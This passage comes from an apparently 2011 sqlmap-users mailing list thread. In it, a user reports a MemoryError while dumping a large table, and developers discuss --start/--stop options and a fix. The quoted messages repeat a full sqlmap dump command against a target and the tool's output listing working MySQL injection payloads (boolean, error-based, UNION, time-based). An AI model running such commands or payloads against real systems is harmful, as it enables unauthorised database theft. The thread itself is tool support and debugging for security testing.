"vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" >> >>> -v 3 >> >>> -D nomes -T class --dump >> >>> >> >>> sqlmap/0.9-dev - automatic SQL injection and database takeover >> >>> tool >> >>> http://sqlmap.sourceforge.net >> >>> >> >>> [*] starting at: 16:58:05 >> >>> >> >>> [16:58:05] [DEBUG] cleaning up configuration parameters >> >>> [16:58:05] [DEBUG] setting the HTTP timeout >> >>> [16:58:05] [DEBUG] setting the HTTP Cookie header >> >>> [16:58:05] [DEBUG] setting the HTTP method to POST >> >>> [16:58:05] [DEBUG] creating HTTP requests opener object >> >>> [16:58:05] [INFO] using >> >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file >> >>> [16:58:05] [INFO] resuming injection data from session file >> >>> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file >> >>> [16:58:05] [INFO] testing connection to the target url >> >>> you provided an HTTP Cookie header value. The target url provided its >> >>> own >> >>> Cookie within the HTTP Set-Cookie header. Do you want to continue >> >>> using the >> >>> HTTP Cookie values that you provided? [Y/n] >> >>> sqlmap identified the following injection points with a total of 0 >> >>> HTTP(s) >> >>> requests: >> >>> --- >> >>> Place: POST >> >>> Parameter: vulnparam >> >>> Type: boolean-based blind >> >>> Title: AND boolean-based blind - WHERE or HAVING clause >> >>> Payload: vulnparam=6 AND 5647=5647 >> >>> >> >>> Type: error-based >> >>> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause >> >>> Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT >> >>> COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) >> >>> THEN 1 >> >>> ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM >> >>> information_schema.tables GROUP BY x)a) >> >>> >> >>> Type: UNION query >> >>> Title: MySQL UNION query (NULL) - 4 to 7 columns >> >>> Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, >> >>> CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS >> >>> CHAR), >> >>> CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# >> >>> >> >>> Type: AND/OR time-based blind >> >>> Title: MySQL > 5.0.11 AND time-based blind >> >>> Payload: vulnparam=6 AND SLEEP(5) >> >>> --- >> >>> >> >>> [16:58:06] [INFO] the back-end DBMS is MySQL >> >>> >> >>> web application technology: PHP 5.3.2 >> >>> back-end DBMS: MySQL 5.0 >> >>> [16:58:06] [INFO] fetching columns for table 'class' on database >> >>> 'nomes' >> >>> [16:58:06] [INFO] read from file >> >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns >> >>> [16:58:06] [INFO] fetching entries for table 'class' on database >> >>> 'nomes' >> >>> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, >> >>> CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, >> >>> NULL FROM >> >>> nomes.class# >> >>> [17:00:09] [DEBUG] performed 1 queries in 122 seconds >> >>> >> >>> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry >> >>> your run >> >>> with the latest development version from the Subversion repository. If >> >>> the >> >>> exception persists, please send by e-mail to >> >>> sql...@li... the command line, the following >> >>> text and >> >>> any information needed to reproduce the bug. The developers will try >> >>> to >> >>> reproduce the bug, fix it accordingly and get back to you. >> >>> sqlmap version: 0.9-dev >> >>> Python version: 2.6.5 >> >>> Operating system: posix >> >>> Traceback (most recent call last): >> >>> File "./sqlmap.py", line 83, in main >> >>> start() >> >>> File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, >> >>> in >> >>> start >> >>> action() >> >>> File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in >> >>> action >> >>> conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) >> >>> File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line >> >>> 1189, in >> >>> dumpTable >> >>> entries = inject.getValue(query, blind=False, dump=True) >> >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in >> >>> getValue >> >>> value = __goInband(query, expected, sort, resumeValue, unpack, >> >>> dump) >> >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in >> >>> __goInband >> >>> data = parseUnionPage(output, expression, partial, None, sort) >> >>> File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in >> >>> parseUnionPage >> >>> dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, >> >>> kb.injection.place, conf.parameters[kb.injection.place], expression, >> >>> logOutput)) >> >>> MemoryError >> >>> >> >>> [*] shutting down at: 17:00:13 >> >>> >> >>> There are about 50,350 entries in the table and 48 columns.I tested >> >>> the >> >>> query manually, and returned a page with 600k of information.I think >> >>> that >> >>> sqlmap did not support the amount of data...? >> >>> >> >>> David >> >>> >> >>> >> >>> ------------------------------------------------------------------------------ >> >>> Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! >> >>> Finally, a world-class log management solution at an even better >> >>> price-free! >> >>> Download using promo code Free_Logger_4_Dev2Dev. Offer expires >> >>> February 28th, so secure your free ArcSight Logger TODAY! >> >>> http://p.sf.net/sfu/arcsight-sfd2d >> >>> _______________________________________________ >> >>> sqlmap-users mailing list >> >>> sql...@li... >> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >>> >> >>> >> >> >> >> >> >> >> >> -- >> >> Miroslav Stampar >> >> >> >> E-mail / Jabber: miroslav.stampar (at) gmail.com >> >> Mobile: +385921010204 (HR 0921010204) >> >> PGP Key ID: 0xB5397B1B >> >> Location: Zagreb, Croatia >> >> >> > >> > >> > >> > -- >> > Miroslav Stampar >> > >> > E-mail / Jabber: miroslav.stampar (at) gmail.com >> > Mobile: +385921010204 (HR 0921010204) >> > PGP Key ID: 0xB5397B1B >> > Location: Zagreb, Croatia >> > >> >> >> >> -- >> Miroslav Stampar >> >> E-mail / Jabber: miroslav.stampar (at) gmail.com >> Mobile: +385921010204 (HR 0921010204) >> PGP Key ID: 0xB5397B1B >> Location: Zagreb, Croatia > > > > -- > David Gomes Guimarães > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-01-28 23:06:54
|
Hi David. I've made a little testing and couldn't reproduce this one. 100,000 rows with 100 columns (integer numbers from 0-99) and still no crashing (30MB long session file). Also, I've tried to make a really large array, but still nothing. OS went unresponsive, but couldn't get "MemoryError". Could you try to run it on some other system? Also, is there anything else interesting about this "large" data retrieval? KR On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> wrote: > # ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" > --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3 > -D nomes -T class --dump > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 16:58:05 > > [16:58:05] [DEBUG] cleaning up configuration parameters > [16:58:05] [DEBUG] setting the HTTP timeout > [16:58:05] [DEBUG] setting the HTTP Cookie header > [16:58:05] [DEBUG] setting the HTTP method to POST > [16:58:05] [DEBUG] creating HTTP requests opener object > [16:58:05] [INFO] using > '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file > [16:58:05] [INFO] resuming injection data from session file > [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file > [16:58:05] [INFO] testing connection to the target url > you provided an HTTP Cookie header value. The target url provided its own > Cookie within the HTTP Set-Cookie header. Do you want to continue using the > HTTP Cookie values that you provided? [Y/n] > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: POST > Parameter: vulnparam > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: vulnparam=6 AND 5647=5647 > > Type: error-based > Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause > Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT > COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1 > ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM > information_schema.tables GROUP BY x)a) > > Type: UNION query > Title: MySQL UNION query (NULL) - 4 to 7 columns > Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, > CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR), > CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: vulnparam=6 AND SLEEP(5) > --- > > [16:58:06] [INFO] the back-end DBMS is MySQL > > web application technology: PHP 5.3.2 > back-end DBMS: MySQL 5.0 > [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes' > [16:58:06] [INFO] read from file > '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns > [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes' > [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, > CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM > nomes.class# > [17:00:09] [DEBUG] performed 1 queries in 122 seconds > > [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run > with the latest development version from the Subversion repository. If the > exception persists, please send by e-mail to > sql...@li... the command line, the following text and > any information needed to reproduce the bug. The developers will try to > reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 0.9-dev > Python version: 2.6.5 > Operating system: posix > Traceback (most recent call last): > File "./sqlmap.py", line 83, in main > start() > File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in > start > action() > File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action > conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) > File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in > dumpTable > entries = inject.getValue(query, blind=False, dump=True) > File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue > value = __goInband(query, expected, sort, resumeValue, unpack, dump) > File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband > data = parseUnionPage(output, expression, partial, None, sort) > File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in > parseUnionPage > dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, > kb.injection.place, conf.parameters[kb.injection.place], expression, > logOutput)) > MemoryError > > [*] shutting down at: 17:00:13 > > There are about 50,350 entries in the table and 48 columns.I tested the > query manually, and returned a page with 600k of information.I think that > sqlmap did not support the amount of data...? > > David > > ------------------------------------------------------------------------------ > Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! > Finally, a world-class log management solution at an even better price-free! > Download using promo code Free_Logger_4_Dev2Dev. Offer expires > February 28th, so secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsight-sfd2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-02-02 09:47:05
|
Now also UNION query technique take into account --start and --stop, like other techniques. Bernardo On 28 January 2011 15:12, Miroslav Stampar <mir...@gm...> wrote: > yes, Bernardo warned me about this yesterday night :) > > we'll try to find something > > kr > > On Fri, Jan 28, 2011 at 4:02 PM, David Guimaraes <sk...@gm...> wrote: >> --start and --stop are not working >> >> Sqlmap just ignore these parameter. i think when used with union injection >> technique, these parameters are ignored(??). tried with --start 1 and --stop >> 20. >> >> >> On Thu, Jan 27, 2011 at 6:04 PM, Miroslav Stampar >> <mir...@gm...> wrote: >>> >>> in the mean time you can try to use these: >>> >>> --start=LIMITSTART First query output entry to retrieve >>> --stop=LIMITSTOP Last query output entry to retrieve >>> >>> kr >>> >>> On Thu, Jan 27, 2011 at 8:55 PM, Miroslav Stampar >>> <mir...@gm...> wrote: >>> > http://mail.python.org/pipermail/mailman-users/2005-October/047436.html >>> > >>> > "A MemoryError exception is a built-in Python exception "Raised when an >>> > operation runs out of memory but the situation may still be rescued >>> > (by deleting some objects)." >>> > >>> > How many members does this list have? According to the FAQ, the largest >>> > list reported to date has 147,000 members and presumably works. >>> > Possibly something in the cPanel implementation or your particular >>> > installation limits this to a greater degree." >>> > >>> > now, this messes our concept a bit but we'll try to adapt. >>> > >>> > kr >>> > >>> > On Thu, Jan 27, 2011 at 8:45 PM, Miroslav Stampar >>> > <mir...@gm...> wrote: >>> >> LOL (50,350 entries in the table and 48 columns) >>> >> >>> >> we'll try to make some tests regarding this and report accordingly. >>> >> haven't planed this kind of "huge" data retrievals :) >>> >> >>> >> kr >>> >> >>> >> On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> >>> >> wrote: >>> >>> # ./sqlmap.py --method post --cookie >>> >>> "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" >>> >>> --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" >>> >>> -v 3 >>> >>> -D nomes -T class --dump >>> >>> >>> >>> sqlmap/0.9-dev - automatic SQL injection and database takeover >>> >>> tool >>> >>> http://sqlmap.sourceforge.net >>> >>> >>> >>> [*] starting at: 16:58:05 >>> >>> >>> >>> [16:58:05] [DEBUG] cleaning up configuration parameters >>> >>> [16:58:05] [DEBUG] setting the HTTP timeout >>> >>> [16:58:05] [DEBUG] setting the HTTP Cookie header >>> >>> [16:58:05] [DEBUG] setting the HTTP method to POST >>> >>> [16:58:05] [DEBUG] creating HTTP requests opener object >>> >>> [16:58:05] [INFO] using >>> >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file >>> >>> [16:58:05] [INFO] resuming injection data from session file >>> >>> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file >>> >>> [16:58:05] [INFO] testing connection to the target url >>> >>> you provided an HTTP Cookie header value. The target url provided its >>> >>> own >>> >>> Cookie within the HTTP Set-Cookie header. Do you want to continue >>> >>> using the >>> >>> HTTP Cookie values that you provided? [Y/n] >>> >>> sqlmap identified the following injection points with a total of 0 >>> >>> HTTP(s) >>> >>> requests: >>> >>> --- >>> >>> Place: POST >>> >>> Parameter: vulnparam >>> >>> Type: boolean-based blind >>> >>> Title: AND boolean-based blind - WHERE or HAVING clause >>> >>> Payload: vulnparam=6 AND 5647=5647 >>> >>> >>> >>> Type: error-based >>> >>> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause >>> >>> Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT >>> >>> COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) >>> >>> THEN 1 >>> >>> ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM >>> >>> information_schema.tables GROUP BY x)a) >>> >>> >>> >>> Type: UNION query >>> >>> Title: MySQL UNION query (NULL) - 4 to 7 columns >>> >>> Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, >>> >>> CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS >>> >>> CHAR), >>> >>> CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# >>> >>> >>> >>> Type: AND/OR time-based blind >>> >>> Title: MySQL > 5.0.11 AND time-based blind >>> >>> Payload: vulnparam=6 AND SLEEP(5) >>> >>> --- >>> >>> >>> >>> [16:58:06] [INFO] the back-end DBMS is MySQL >>> >>> >>> >>> web application technology: PHP 5.3.2 >>> >>> back-end DBMS: MySQL 5.0 >>> >>> [16:58:06] [INFO] fetching columns for table 'class' on database >>> >>> 'nomes' >>> >>> [16:58:06] [INFO] read from file >>> >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns >>> >>> [16:58:06] [INFO] fetching entries for table 'class' on database >>> >>> 'nomes' >>> >>> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, >>> >>> CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, >>> >>> NULL FROM >>> >>> nomes.class# >>> >>> [17:00:09] [DEBUG] performed 1 queries in 122 seconds >>> >>> >>> >>> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry >>> >>> your run >>> >>> with the latest development version from the Subversion repository. If >>> >>> the >>> >>> exception persists, please send by e-mail to >>> >>> sql...@li... the command line, the following >>> >>> text and >>> >>> any information needed to reproduce the bug. The developers will try >>> >>> to >>> >>> reproduce the bug, fix it accordingly and get back to you. >>> >>> sqlmap version: 0.9-dev >>> >>> Python version: 2.6.5 >>> >>> Operating system: posix >>> >>> Traceback (most recent call last): >>> >>> File "./sqlmap.py", line 83, in main >>> >>> start() >>> >>> File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, >>> >>> in >>> >>> start >>> >>> action() >>> >>> File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in >>> >>> action >>> >>> conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) >>> >>> File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line >>> >>> 1189, in >>> >>> dumpTable >>> >>> entries = inject.getValue(query, blind=False, dump=True) >>> >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in >>> >>> getValue >>> >>> value = __goInband(query, expected, sort, resumeValue, unpack, >>> >>> dump) >>> >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in >>> >>> __goInband >>> >>> data = parseUnionPage(output, expression, partial, None, sort) >>> >>> File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in >>> >>> parseUnionPage >>> >>> dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, >>> >>> kb.injection.place, conf.parameters[kb.injection.place], expression, >>> >>> logOutput)) >>> >>> MemoryError >>> >>> >>> >>> [*] shutting down at: 17:00:13 >>> >>> >>> >>> There are about 50,350 entries in the table and 48 columns.I tested >>> >>> the >>> >>> query manually, and returned a page with 600k of information.I think >>> >>> that >>> >>> sqlmap did not support the amount of data...? >>> >>> >>> >>> David >>> >>> >>> >>> >>> >>> ------------------------------------------------------------------------------ >>> >>> Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! >>> >>> Finally, a world-class log management solution at an even better >>> >>> price-free! >>> >>> Download using promo code Free_Logger_4_Dev2Dev. Offer expires >>> >>> February 28th, so secure your free ArcSight Logger TODAY! >>> >>> http://p.sf.net/sfu/arcsight-sfd2d >>> >>> _______________________________________________ >>> >>> sqlmap-users mailing list >>> >>> sql...@li... >>> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >>> >>> >>> >> >>> >> >>> >> >>> >> -- >>> >> Miroslav Stampar >>> >> >>> >> E-mail / Jabber: miroslav.stampar (at) gmail.com >>> >> Mobile: +385921010204 (HR 0921010204) >>> >> PGP Key ID: 0xB5397B1B >>> >> Location: Zagreb, Croatia >>> >> >>> > >>> > >>> > >>> > -- >>> > Miroslav Stampar >>> > >>> > E-mail / Jabber: miroslav.stampar (at) gmail.com >>> > Mobile: +385921010204 (HR 0921010204) >>> > PGP Key ID: 0xB5397B1B >>> > Location: Zagreb, Croatia >>> > >>> >>> >>> >>> -- >>> Miroslav Stampar >>> >>> E-mail / Jabber: miroslav.stampar (at) gmail.com >>> Mobile: +385921010204 (HR 0921010204) >>> PGP Key ID: 0xB5397B1B >>> Location: Zagreb, Croatia >> >> >> >> -- >> David Gomes Guimarães >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > > ------------------------------------------------------------------------------ > Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! > Finally, a world-class log management solution at an even better price-free! > Download using promo code Free_Logger_4_Dev2Dev. Offer expires > February 28th, so secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsight-sfd2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
|
From: David G. <sk...@gm...> - 2011-02-02 11:12:02
|
Thank u bernardo. =) On Wed, Feb 2, 2011 at 7:46 AM, Bernardo Damele A. G. < ber...@gm...> wrote: > Now also UNION query technique take into account --start and --stop, > like other techniques. > > Bernardo > > On 28 January 2011 15:12, Miroslav Stampar <mir...@gm...> > wrote: > > yes, Bernardo warned me about this yesterday night :) > > > > we'll try to find something > > > > kr > > > > On Fri, Jan 28, 2011 at 4:02 PM, David Guimaraes <sk...@gm...> > wrote: > >> --start and --stop are not working > >> > >> Sqlmap just ignore these parameter. i think when used with union > injection > >> technique, these parameters are ignored(??). tried with --start 1 and > --stop > >> 20. > >> > >> > >> On Thu, Jan 27, 2011 at 6:04 PM, Miroslav Stampar > >> <mir...@gm...> wrote: > >>> > >>> in the mean time you can try to use these: > >>> > >>> --start=LIMITSTART First query output entry to retrieve > >>> --stop=LIMITSTOP Last query output entry to retrieve > >>> > >>> kr > >>> > >>> On Thu, Jan 27, 2011 at 8:55 PM, Miroslav Stampar > >>> <mir...@gm...> wrote: > >>> > > http://mail.python.org/pipermail/mailman-users/2005-October/047436.html > >>> > > >>> > "A MemoryError exception is a built-in Python exception "Raised when > an > >>> > operation runs out of memory but the situation may still be rescued > >>> > (by deleting some objects)." > >>> > > >>> > How many members does this list have? According to the FAQ, the > largest > >>> > list reported to date has 147,000 members and presumably works. > >>> > Possibly something in the cPanel implementation or your particular > >>> > installation limits this to a greater degree." > >>> > > >>> > now, this messes our concept a bit but we'll try to adapt. > >>> > > >>> > kr > >>> > > >>> > On Thu, Jan 27, 2011 at 8:45 PM, Miroslav Stampar > >>> > <mir...@gm...> wrote: > >>> >> LOL (50,350 entries in the table and 48 columns) > >>> >> > >>> >> we'll try to make some tests regarding this and report accordingly. > >>> >> haven't planed this kind of "huge" data retrievals :) > >>> >> > >>> >> kr > >>> >> > >>> >> On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm... > > > >>> >> wrote: > >>> >>> # ./sqlmap.py --method post --cookie > >>> >>> "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" > >>> >>> --data "vulnparam=6" -u " > http://www.vulnsite.com/intranet/vulnphp.php" > >>> >>> -v 3 > >>> >>> -D nomes -T class --dump > >>> >>> > >>> >>> sqlmap/0.9-dev - automatic SQL injection and database takeover > >>> >>> tool > >>> >>> http://sqlmap.sourceforge.net > >>> >>> > >>> >>> [*] starting at: 16:58:05 > >>> >>> > >>> >>> [16:58:05] [DEBUG] cleaning up configuration parameters > >>> >>> [16:58:05] [DEBUG] setting the HTTP timeout > >>> >>> [16:58:05] [DEBUG] setting the HTTP Cookie header > >>> >>> [16:58:05] [DEBUG] setting the HTTP method to POST > >>> >>> [16:58:05] [DEBUG] creating HTTP requests opener object > >>> >>> [16:58:05] [INFO] using > >>> >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session > file > >>> >>> [16:58:05] [INFO] resuming injection data from session file > >>> >>> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session > file > >>> >>> [16:58:05] [INFO] testing connection to the target url > >>> >>> you provided an HTTP Cookie header value. The target url provided > its > >>> >>> own > >>> >>> Cookie within the HTTP Set-Cookie header. Do you want to continue > >>> >>> using the > >>> >>> HTTP Cookie values that you provided? [Y/n] > >>> >>> sqlmap identified the following injection points with a total of 0 > >>> >>> HTTP(s) > >>> >>> requests: > >>> >>> --- > >>> >>> Place: POST > >>> >>> Parameter: vulnparam > >>> >>> Type: boolean-based blind > >>> >>> Title: AND boolean-based blind - WHERE or HAVING clause > >>> >>> Payload: vulnparam=6 AND 5647=5647 > >>> >>> > >>> >>> Type: error-based > >>> >>> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause > >>> >>> Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT > >>> >>> COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN > (714=714) > >>> >>> THEN 1 > >>> >>> ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM > >>> >>> information_schema.tables GROUP BY x)a) > >>> >>> > >>> >>> Type: UNION query > >>> >>> Title: MySQL UNION query (NULL) - 4 to 7 columns > >>> >>> Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, > >>> >>> CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS > >>> >>> CHAR), > >>> >>> CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# > >>> >>> > >>> >>> Type: AND/OR time-based blind > >>> >>> Title: MySQL > 5.0.11 AND time-based blind > >>> >>> Payload: vulnparam=6 AND SLEEP(5) > >>> >>> --- > >>> >>> > >>> >>> [16:58:06] [INFO] the back-end DBMS is MySQL > >>> >>> > >>> >>> web application technology: PHP 5.3.2 > >>> >>> back-end DBMS: MySQL 5.0 > >>> >>> [16:58:06] [INFO] fetching columns for table 'class' on database > >>> >>> 'nomes' > >>> >>> [16:58:06] [INFO] read from file > >>> >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': > vulncolumns > >>> >>> [16:58:06] [INFO] fetching entries for table 'class' on database > >>> >>> 'nomes' > >>> >>> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, > >>> >>> CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, > >>> >>> NULL FROM > >>> >>> nomes.class# > >>> >>> [17:00:09] [DEBUG] performed 1 queries in 122 seconds > >>> >>> > >>> >>> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry > >>> >>> your run > >>> >>> with the latest development version from the Subversion repository. > If > >>> >>> the > >>> >>> exception persists, please send by e-mail to > >>> >>> sql...@li... the command line, the following > >>> >>> text and > >>> >>> any information needed to reproduce the bug. The developers will > try > >>> >>> to > >>> >>> reproduce the bug, fix it accordingly and get back to you. > >>> >>> sqlmap version: 0.9-dev > >>> >>> Python version: 2.6.5 > >>> >>> Operating system: posix > >>> >>> Traceback (most recent call last): > >>> >>> File "./sqlmap.py", line 83, in main > >>> >>> start() > >>> >>> File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line > 414, > >>> >>> in > >>> >>> start > >>> >>> action() > >>> >>> File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, > in > >>> >>> action > >>> >>> conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) > >>> >>> File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line > >>> >>> 1189, in > >>> >>> dumpTable > >>> >>> entries = inject.getValue(query, blind=False, dump=True) > >>> >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in > >>> >>> getValue > >>> >>> value = __goInband(query, expected, sort, resumeValue, unpack, > >>> >>> dump) > >>> >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in > >>> >>> __goInband > >>> >>> data = parseUnionPage(output, expression, partial, None, sort) > >>> >>> File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in > >>> >>> parseUnionPage > >>> >>> dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, > >>> >>> kb.injection.place, conf.parameters[kb.injection.place], > expression, > >>> >>> logOutput)) > >>> >>> MemoryError > >>> >>> > >>> >>> [*] shutting down at: 17:00:13 > >>> >>> > >>> >>> There are about 50,350 entries in the table and 48 columns.I tested > >>> >>> the > >>> >>> query manually, and returned a page with 600k of information.I > think > >>> >>> that > >>> >>> sqlmap did not support the amount of data...? > >>> >>> > >>> >>> David > >>> >>> > >>> >>> > >>> >>> > ------------------------------------------------------------------------------ > >>> >>> Special Offer-- Download ArcSight Logger for FREE (a $49 USD > value)! > >>> >>> Finally, a world-class log management solution at an even better > >>> >>> price-free! > >>> >>> Download using promo code Free_Logger_4_Dev2Dev. Offer expires > >>> >>> February 28th, so secure your free ArcSight Logger TODAY! > >>> >>> http://p.sf.net/sfu/arcsight-sfd2d > >>> >>> _______________________________________________ > >>> >>> sqlmap-users mailing list > >>> >>> sql...@li... > >>> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >>> >>> > >>> >>> > >>> >> > >>> >> > >>> >> > >>> >> -- > >>> >> Miroslav Stampar > >>> >> > >>> >> E-mail / Jabber: miroslav.stampar (at) gmail.com > >>> >> Mobile: +385921010204 (HR 0921010204) > >>> >> PGP Key ID: 0xB5397B1B > >>> >> Location: Zagreb, Croatia > >>> >> > >>> > > >>> > > >>> > > >>> > -- > >>> > Miroslav Stampar > >>> > > >>> > E-mail / Jabber: miroslav.stampar (at) gmail.com > >>> > Mobile: +385921010204 (HR 0921010204) > >>> > PGP Key ID: 0xB5397B1B > >>> > Location: Zagreb, Croatia > >>> > > >>> > >>> > >>> > >>> -- > >>> Miroslav Stampar > >>> > >>> E-mail / Jabber: miroslav.stampar (at) gmail.com > >>> Mobile: +385921010204 (HR 0921010204) > >>> PGP Key ID: 0xB5397B1B > >>> Location: Zagreb, Croatia > >> > >> > >> > >> -- > >> David Gomes Guimarães > >> > > > > > > > > -- > > Miroslav Stampar > > > > E-mail / Jabber: miroslav.stampar (at) gmail.com > > Mobile: +385921010204 (HR 0921010204) > > PGP Key ID: 0xB5397B1B > > Location: 